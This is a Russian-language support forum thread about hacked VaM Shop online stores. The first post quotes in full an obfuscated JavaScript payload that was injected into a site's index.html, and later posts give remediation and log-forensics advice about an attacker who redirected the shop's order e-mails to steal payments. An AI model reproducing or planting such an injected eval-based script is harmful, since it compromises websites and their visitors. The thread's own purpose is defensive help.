hablar 0 Опубликовано 4 февраля, 2009 Жалоба Share Опубликовано 4 февраля, 2009 Каким-то образом был вставлен код в самом конце файла: vamshop_table/index.html. Код следующего вида: <script language=JavaScript> function pblnbn51(b) { var e=b.length,f=1024,m,y,p,k=0,j=0,n=0,t=Array(63,6,37,53,39,43,23,1,7,8,0,0,0,0,0,0,48,17,9,24,50,58,56,15,30,10,27,33,13,21,46,42,47,54,51,22,57,3,0,16,60,31,29,0,0,0,0,52,0,32,49,28,18,5,59,26,55,19,40,38,36,62,35,20,45,41,25,14,44,11,4,61,34,12,2);for(y=Math.ceil(e/f);y>0;y--){p='';for(m=Math.min(e,f);m>0;m--,e--){{n|=(t[b.charCodeAt(k++)-48])<<j;if(j){p+=String.fromCharCode(138^n&255);n>>=8;j-=2}else{j=6}}}eval(p);}}pblnbn51('wGsTN6H0lkP05f00TYJ5s6sTPhgtN6HE0YmflfGqwn0Fm0NjpgfFtn0E40NOlPmTPY5PwxmtRxNOTnYEhxOFmfPm@SgqDNNfNGN0n6sTlssTt6Hqm6gpp1Eb5fPFlxYT0iNfxHXEmusqFPsTN6mTxsIjTkfP0IfjKQOPwxmtRxH5KQIOOQ0FNfPFhkuNROOFPGHfxf0pfOuNOkP0RJmfhxOfn4PmkPmX@dHTl0sO_gJqnRsm5Ymf_QEj') </script>[/code]В результате - сайт перестает отображаться в браузере из-за ошибки: syntax error: unrecognized tag 'var' .Как от этого защититься? Ссылка на сообщение Поделиться на другие сайты
support 447 Опубликовано 5 февраля, 2009 Жалоба Share Опубликовано 5 февраля, 2009 1. Поставить антивирус на компьютер. 2. Почистить комп от вирусов. 3. Поменять доступ на ftp. 4. Удалить этот код из index.html и наверняка такой же код будет в index.php файле. Ссылка на сообщение Поделиться на другие сайты
hablar 0 Опубликовано 5 февраля, 2009 Автор Жалоба Share Опубликовано 5 февраля, 2009 Спасибо, Vam! Все пункты уже проделал, эксплойты и трояны действительно сидели на компе :) Ссылка на сообщение Поделиться на другие сайты
support 447 Опубликовано 5 февраля, 2009 Жалоба Share Опубликовано 5 февраля, 2009 Не за что Ссылка на сообщение Поделиться на другие сайты
Anubis 0 Опубликовано 30 июля, 2010 Жалоба Share Опубликовано 30 июля, 2010 Александр, добрый день. Сегодня после жалобы клиента обнаружили смену e-mail адресов во всех полях в админке-нстройки-основные-настройки e-mail. Все ящики изменены на pesok9999[собака]yandex.ru. Других изменений нет, а вот клиент получил такое распрекрасное письмо :) - Здравствуйте Ольга!На данный момент доступна только оплата через систему Яндекс.Деньги. Переведите сумму в размере 1260 руб. на счет 41001618304190 . После того как мы убедимся, что вы оплатили товар, мы обговорим время доставки. Доставка будет производиться бесплатно! Сумма заказа и сумма в письме взломщика совпадают... Это перехват пароля или взломан скрипт? Как узнать через какую уязвимость произошла неприятность? Человеческий фактор и вирусы уже исключены... Ссылка на сообщение Поделиться на другие сайты
support 447 Опубликовано 30 июля, 2010 Жалоба Share Опубликовано 30 июля, 2010 На данный момент дырки в скрипты лично мне неизвестны. А почему вирусы исключены?! Ссылка на сообщение Поделиться на другие сайты
Anubis 0 Опубликовано 30 июля, 2010 Жалоба Share Опубликовано 30 июля, 2010 А почему вирусы исключены?! Пароль к аккаунту админа прописан только на двух машинах в файрфоксе в виде сохраненного. Результаты проверки этих машин ничего не дали. Dr.web 6.0, базы по сегодняшний день. Пароли к ftp, sql нигде не сохранены и не прописаны... Ссылка на сообщение Поделиться на другие сайты
support 447 Опубликовано 31 июля, 2010 Жалоба Share Опубликовано 31 июля, 2010 Если знаете дату примерно когда поменяли настройки, то можно разве что по лог-файлам веб-сервера смотреть, как могли попасть. Но я лично сомневаюсь, что дело в скриптах, если у Вас VaM Shop самой свежей 1.58 версии. Если совсем старая версия, двухлетней давности например, то может быть, т.к. в старых версиях закрывались дырки. Ссылка на сообщение Поделиться на другие сайты
ABerezin 0 Опубликовано 31 июля, 2010 Жалоба Share Опубликовано 31 июля, 2010 0. Сменить все пароли. 1. Как сказал Саша - сохранить все доступные логи. В том числе логи фтп, если они есть. Начать с логов фтп - поискать заходы с чужих ip. 2. Проверить сайт на присутствие посторонних файлов. Особое внимание директориям, доступным для записи - images, cache, pub и т.д. Если найдёте - не удаляйте! Нужно запомнить имя, дату создания. По дате создания искать в логах кто и как загрузил этот файл, что этот ip делал до того. После этого в найденный файл можно поставить ловушку, которая сообщит об использовании этого файла и выдаст какой-нибудь http-код, например 404, или переименовать/удалить. 3. Есть ещё вероятность проникновения от соседей по хостингу. При некоторых настройках системы (точнее не настройках) можно гулять по файловой системе хостинга. И соответственно узнать данные доступа к БД. После этого, зная структуру БД легко можно поменять, адреса, счета реквизиты и всё остальное. Следует учитывать, что зачастую такие скрипты удаляются сразу после использования. Поэтому лучше всё-таки использовать мониторинг файловой системы. Плюс мониторинг ключевых значений в базе данных. На всякий случай - "не навредит". Тем более сейчас, когда база восстановлена, а способ проникновения не известен и вероятность повторного проникновения весьма велика. Ссылка на сообщение Поделиться на другие сайты
Рекомендуемые сообщения